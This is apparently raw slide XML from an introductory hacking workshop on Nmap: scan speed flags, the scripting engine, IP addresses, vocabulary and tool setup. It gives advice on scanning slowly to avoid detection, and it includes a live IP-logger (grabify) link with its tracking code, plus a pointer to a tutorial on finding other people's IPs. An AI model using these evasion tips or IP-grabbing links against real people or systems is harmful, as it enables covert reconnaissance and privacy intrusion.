              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440" indent="-91080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>!!!!!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9485640" y="-371520"/>
            <a:ext cx="2960280" cy="2960280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3843720" y="471960"/>
            <a:ext cx="1447200" cy="1273680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506160" y="5005080"/>
            <a:ext cx="1105344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Calibri"/>
              </a:rPr>
              <a:t>Tell your kids, friends, family and mistress that you may not be around</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US"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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Speed (Flags) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>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In order to not get detected or overwhelm the system, you should run scans at appropriate speed. </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-T1 (Paranoid),  -T1 (Sneaky), –T2  (Polite), -T3 (Normal), -T4(Aggressive), -T5 (Insane)</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-T1 may take forever, but avoids detection </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-T5 be careful. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="149" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9485640" y="-371520"/>
            <a:ext cx="2960280" cy="296028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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>NSE (Nmap Scripting Engine) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>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 Lua Programming language </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This is an extension of Nmap. Recall Nmap just scans and nothing more. NSE however makes it possible for Nmap to interact, DoS, Exploit Vulnerabilities, do actual work. </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Writing your own scripts makes Nmap more malleable. </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u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://nmap.org/nsedoc/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </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For now, just know that it exists, remember what NSE stands for, and read about it. </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Go and find out more, write your own scripts. </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ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>sudo nmap –script-updatedb</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>	</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updates the script database. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9485640" y="-371520"/>
            <a:ext cx="2960280" cy="296028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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Internet Protocol (IP) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0">
            <a:normAutofit/>
          </a:bodyPr>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Public IP (Not hard to come by) </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 Below I provide a tutorial of how to find other peoples public IP. </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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://bit.ly/2PGWJYc</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> (Tutorial) Put in browser. </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-Dynamic vs Static (Discuss) </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Private IP (One can do damage) </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 A little more work. </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Discussion: What can you do with IP? </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EDUCATIONAL PURPOSE ONLY: NOT FOR THE LIGHT OF  HEART</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Check this out: (PLEASE DO NOT CLICK ON THIS LINK OR OPEN IN BROWSER) </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u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://grabify.link/3FOJZA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </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Code: Z2JS3M</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Why</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>By now you should have seen the commands and flag, have done some scans. Although we are limited by scanme.nmap.org, we should be familiar with what NMAP is capable of. Make sure you know IP, TCP, UDP, MAC Address... </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Ending.......</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="157" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9485640" y="-371520"/>
            <a:ext cx="2960280" cy="296028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1066680" y="2432880"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="91440" indent="-91080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="9600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>We begin.......</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="9600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440" indent="-91080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://ucmerced.box.com/s/ne9b3gyfgs2d3ubaxrdsurxihdc65nak</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440" indent="-91080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://bit.ly/2OrPezQ</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440" indent="-91080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Password will be provided by discussion leader. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="159" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9485640" y="-371520"/>
            <a:ext cx="2960280" cy="296028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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Vocabulary </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>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LAN: Local Area Network (Private Internet protocol) </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ISP: Internet Service Provider | (at&amp;t, Verizon, ..)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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IoT: Internet of Things | (devices) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>A Linux Distribution </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Do you have the following in a virtual machine? Choose one, for ubuntu you may have to download some tools. Kali Linux has tools pre installed. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-456840">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri Light"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Kali Linux </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-456840">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri Light"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Using Python Version 2 </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
